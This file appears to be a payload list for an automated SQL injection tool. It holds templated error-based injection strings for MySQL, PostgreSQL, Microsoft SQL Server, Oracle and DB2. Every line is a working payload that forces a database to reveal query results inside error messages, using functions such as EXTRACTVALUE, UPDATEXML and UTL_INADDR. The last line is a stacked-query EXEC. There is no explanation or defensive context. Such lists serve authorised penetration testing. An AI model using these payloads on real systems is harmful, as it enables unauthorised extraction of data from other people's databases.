{WHERE1} AND (SELECT 2*(IF({QUERY}, 8446744073709551610, 8446744073709551610)))
{WHERE1} OR (SELECT 2*(IF({QUERY}, 8446744073709551610, 8446744073709551610)))
{WHERE1} AND EXP(~{QUERY})
{WHERE1} OR EXP (~{QUERY})
{WHERE1} AND GTID_SUBSET(CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'),{RANDNUM})
{WHERE1} OR GTID_SUBSET(CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'),{RANDNUM})
{WHERE1} AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}')) USING utf8)))
{WHERE1} OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}')) USING utf8)))
{WHERE1} AND (SELECT {RANDNUM} FROM{QUERY}a)
{WHERE1} OR (SELECT {RANDNUM} FROM{QUERY}a)
{WHERE1} (SELECT {RANDNUM} FROM{QUERY}a)
{WHERE1} AND EXTRACTVALUE({RANDNUM},CONCAT('\','{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'))
{WHERE1} OR EXTRACTVALUE({RANDNUM},CONCAT('\','{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'))
{WHERE1} AND UPDATEXML({RANDNUM},CONCAT('.','{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'),{RANDNUM1})
{WHERE1} OR UPDATEXML({RANDNUM},CONCAT('.','{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'),{RANDNUM1})
{WHERE1} AND ROW({RANDNUM},{RANDNUM1})>(SELECT COUNT(*),CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}',FLOOR(RAND(0)*2))x FROM (SELECT {RANDNUM2} UNION SELECT {RANDNUM3} UNION SELECT {RANDNUM4} UNION SELECT {RANDNUM5})a GROUP BY x)
{WHERE1} OR ROW({RANDNUM},{RANDNUM1})>(SELECT COUNT(*),CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}',FLOOR(RAND(0)*2))x FROM (SELECT {RANDNUM2} UNION SELECT {RANDNUM3} UNION SELECT {RANDNUM4} UNION SELECT {RANDNUM5})a GROUP BY x)
{WHERE2} OR 1 GROUP BY CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}',FLOOR(RAND(0)*2)) HAVING MIN(0)
{WHERE1} AND {RANDNUM}=CAST('{DELIMITER_START}'||{QUERY}::text||'{DELIMITER_STOP}' AS NUMERIC)
{WHERE2} OR {RANDNUM}=CAST('{DELIMITER_START}'||{QUERY}::text||'{DELIMITER_STOP}' AS NUMERIC)
{WHERE1} AND {RANDNUM} IN (SELECT ('{DELIMITER_START}'+{QUERY}+'{DELIMITER_STOP}'))
{WHERE2} OR {RANDNUM} IN (SELECT ('{DELIMITER_START}'+{QUERY}+'{DELIMITER_STOP}'))
{WHERE1} AND {RANDNUM}=CONVERT(INT,(SELECT '{DELIMITER_START}'+{QUERY}+'{DELIMITER_STOP}'))
{WHERE2} OR {RANDNUM}=CONVERT(INT,(SELECT '{DELIMITER_START}'+{QUERY}+'{DELIMITER_STOP}'))
{WHERE1} AND {RANDNUM}=CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}')
{WHERE1} AND {RANDNUM}=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'||CHR(62))) FROM DUAL)
{WHERE2} OR {RANDNUM}=CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}')
{WHERE1}AND {RANDNUM}=UTL_INADDR.GET_HOST_ADDRESS('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE2} OR {RANDNUM}=UTL_INADDR.GET_HOST_ADDRESS('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE2} OR {RANDNUM}=CTXSYS.DRITHSX.SN({RANDNUM},('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'))
{WHERE1} AND {RANDNUM}=CTXSYS.DRITHSX.SN({RANDNUM},('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'))
{WHERE1} AND {RANDNUM}=DBMS_UTILITY.SQLID_TO_SQLHASH(('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'))
{WHERE2} OR {RANDNUM}=DBMS_UTILITY.SQLID_TO_SQLHASH(('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'))
{WHERE2} OR {RANDNUM}=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'||CHR(62))) FROM DUAL)
{WHERE1} AND {RANDNUM}=('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE1} AND {RANDNUM}=('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE2} OR {RANDNUM}=('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE1} AND {RANDNUM}=CAST('{DELIMITER_START}'||{QUERY}::varchar||'{DELIMITER_STOP}' AS NUMERIC)
{WHERE2} OR {RANDNUM}=('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE2} OR {RANDNUM}=CAST('{DELIMITER_START}'||{QUERY}::varchar||'{DELIMITER_STOP}' AS NUMERIC)
{WHERE1} OR {RANDNUM}=RAISE_ERROR('70001','{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE1} AND {RANDNUM}=('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE1} AND {RANDNUM}=RAISE_ERROR('70001','{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE1} OR {RANDNUM}=('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE3} (SELECT 2*(IF({QUERY}, 8446744073709551610, 8446744073709551610)))
{WHERE3} EXP(~{QUERY})
{WHERE1} PROCEDURE ANALYSE(EXTRACTVALUE({RANDNUM},CONCAT('\','{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}')),1)
{WHERE3} (SELECT {RANDNUM} FROM{QUERY}a)
{WHERE3} JSON_KEYS((SELECT CONVERT((SELECT CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}')) USING utf8)))
{WHERE3} GTID_SUBSET(CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'),{RANDNUM})
{WHERE3} (EXTRACTVALUE({RANDNUM},CONCAT('\','{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}')))
{WHERE3} (CAST('{DELIMITER_START}'||{QUERY}::text||'{DELIMITER_STOP}' AS NUMERIC))
{WHERE3} (CAST('{DELIMITER_START}'||{QUERY} ||'{DELIMITER_STOP}' AS NUMERIC))
{WHERE3} (UPDATEXML({RANDNUM},CONCAT('.','{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'),{RANDNUM1}))
{WHERE3} (SELECT '{DELIMITER_START}'+{QUERY}+'{DELIMITER_STOP}')
{WHERE3} (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'||CHR(62))) FROM DUAL)
{WHERE3} (CONVERT(INT,(SELECT '{DELIMITER_START}'+{QUERY}+'{DELIMITER_STOP}')))
{WHERE3} (SELECT {RANDNUM}=('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'))
{WHERE1} ,(SELECT {RANDNUM} FROM (SELECT 2*(IF({QUERY}, 8446744073709551610, 8446744073709551610)))x)
{WHERE3} RAISE_ERROR('70001','{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE1} ,GTID_SUBSET(CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'),{RANDNUM})
{WHERE1} ,(SELECT {RANDNUM} FROM (SELECT EXP(~{QUERY}))s)
{WHERE1} ,(SELECT {RANDNUM} FROM{QUERY}a)
{WHERE1} ,(SELECT {RANDNUM} FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}')) USING utf8))))x)
{WHERE1} ,EXTRACTVALUE({RANDNUM},CONCAT('\','{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'))
{WHERE1} ,(SELECT {RANDNUM} FROM (SELECT ROW({RANDNUM},{RANDNUM1})>(SELECT COUNT(*),CONCAT('{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}',FLOOR(RAND(0)*2))x FROM (SELECT {RANDNUM2} UNION SELECT {RANDNUM3} UNION SELECT {RANDNUM4} UNION SELECT {RANDNUM5})a GROUP BY x))s)
{WHERE1} ,UPDATEXML({RANDNUM},CONCAT('.','{DELIMITER_START}',{QUERY},'{DELIMITER_STOP}'),{RANDNUM1})
{WHERE1} ,(CAST('{DELIMITER_START}'||{QUERY} ||'{DELIMITER_STOP}' AS NUMERIC))
{WHERE1} ,(SELECT {RANDNUM} WHERE {RANDNUM}=CONVERT(INT,(SELECT '{DELIMITER_START}'+{QUERY}+'{DELIMITER_STOP}')))
{WHERE1} ,(CAST('{DELIMITER_START}'||{QUERY}::text||'{DELIMITER_STOP}' AS NUMERIC))
{WHERE1} ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'||CHR(62))) FROM DUAL)
{WHERE1} ,RAISE_ERROR('70001','{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}')
{WHERE1} ,(SELECT {RANDNUM}=('{DELIMITER_START}'||{QUERY}||'{DELIMITER_STOP}'))
{WHERE1} ;DECLARE @{RANDSTR} NVARCHAR(4000);SET @{RANDSTR}=(SELECT '{DELIMITER_START}'+{QUERY}+'{DELIMITER_STOP}');EXEC @{RANDSTR} --
